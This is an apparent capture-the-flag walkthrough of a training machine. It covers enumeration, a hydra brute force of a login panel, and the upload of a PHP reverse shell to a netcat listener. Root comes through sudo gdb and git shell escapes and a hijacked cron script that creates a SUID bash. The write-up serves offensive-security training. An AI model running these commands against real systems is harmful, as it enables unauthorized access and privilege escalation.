[Enumeration]
- Port scan
nmap -Pn <ip>There’re 3 ports: 21 ftp, 22 ssh, and 80 http.
2. OS and service scan
nmap -A -p 21,22,80 <ip>There’s ftp with anonymous login
3. Vuln scan
nmap --script vuln -p 21,22,80 <ip>There’s robots.txt on HTTP site.
4. Access HTTP site
View page source. Nothing much.
Access /robots.txt. There’re /admin-dir and username: d4rckh
Note it.
Access /admin-dir. There’re 2 files.
Download all of them
wget http://<ip>/admin-dir/credentials.txt
wget http://<ip>/admin-dir/userid
Read it
cat useridSeems like it’s list of usernames.
cat credentials.txtSeems like it’s password list.
Scan HTTP site’s directory
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html,sh,cgiAfter wait for a while. Nothing new.
5. Access FTP
ftp <ip>Name: anonymous
ls -laThere’re 1 directory (…) and 1 file (text.txt).
Download text.txt
get test.txt
cd ...There’s another “…”
ls -la
Download the file
get yougotgoodeyes.txt
Read downloaded file
cat test.txt
cat yougotgoodeyes.txtThere’s another directory on HTTP site.
6. Access hidden directory, “/sUp3r-s3cr3t”.
It’s a login panel.
Scan sub-directory
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/sUp3r-s3cr3t/ -x php,txt,html,sh,cgiThere’s /images
Access /images. There’s another directory, /uploads.
Access uploads/
Access pogcat.png
7. Brute-forcing login panel.
Try input test:test and intercept with Burp-Suite.
Now I have the parameter.
Forward the request. Now I have error message.
Let’s brute-forcing it.
Craft the command
hydra -L userid -P credentials.txt <ip> http-post-form "/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:F=Incorrect username!" -V -F -u
Run the command
I got the new message, “Incorrect password!”
Let’s craft the command again
hydra -l enox -P credentials.txt <ip> http-post-form "/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:F=Incorrect password!" -V -F -uRun the command
Try to login again. Success!!!
I can upload reverse shell.
7. Reverse shell
Prepare PHP shell
Change the IP and port to be mine.
Create listener
nc -lvp 1234
Upload it.
I think It’s in http://<ip>/sUp3r-s3cr3t/images/uploads as I scanned previously.
Access. I can see my file.
Click it. Back to my listener, Now I have a shell but It’s not stable.
8. Stable shell
Reference:
python -c 'import pty;pty.spawn("/bin/bash");'
Ctrl+z
stty raw -echofgexport TERM=xterm
After “stty raw -echo”, the screen seems stuck but it’s not. Just type “fg”.
9. Search for users
cat /etc/passwdThere’re 3 users in this machine: root, thirtytwo, and d4rckh.
10. Search for user.txt
Let’s explore /home
cd /homels -la
There’re 3 directories.
cd cleanupls -la
cd ../d4rckhls -la
There’s user.txt
cat user.txt
[Privilege Escalation]
- Verify sudo
sudo -lI can run /var/www/gdb as thirtytwo
I’ll have to adjust the command
sudo -u thirtytwo /var/www/gdb -nx -ex '!sh' -ex quwhoami
Now I’m thirtytwo.
Get TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'
2. Verify sudo as thirtytwo
sudo -lI can run git as d4rckh.
There’re 4 commands. Let’s try one by one
sudo -u d4rckh PAGER='sh -c "exec sh 0<&1"' git -p helpFailed.
Try another command
sudo -u d4rckh git -p help config!/bin/sh
whoamiSuccess!!!. Now I’m d4rckh.
Get TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'
3. Escalate privilege from d4rckh
Verify sudo
sudo -lNeed password
Verify SUID
find / -perm -u=s -type f 2>/dev/nullThere’s a gdb standing out, but I already used it.
Verify capabilities
getcap -r / 2>/dev/null
Verify cron
cat /etc/crontabThere’s a file.
Let’s take a look into it.
lscat cleanup.py
I can replace it to get a shell.
Backup
mv cleanup.py cleanup.py.bakls
Edit the file
nano cleanup.pyI have to fix it.
After googling, I came across to this site.
export TERM=xterm
nano cleanup.py
Replace the command with:
cp /bin/bash /tmp/rootbash;chmod +xs /tmp/rootbash
Wait about 2 mins.
cd /tmpls -la/tmp/rootbash -pwhoami
cd /rootls -lacat root.txt
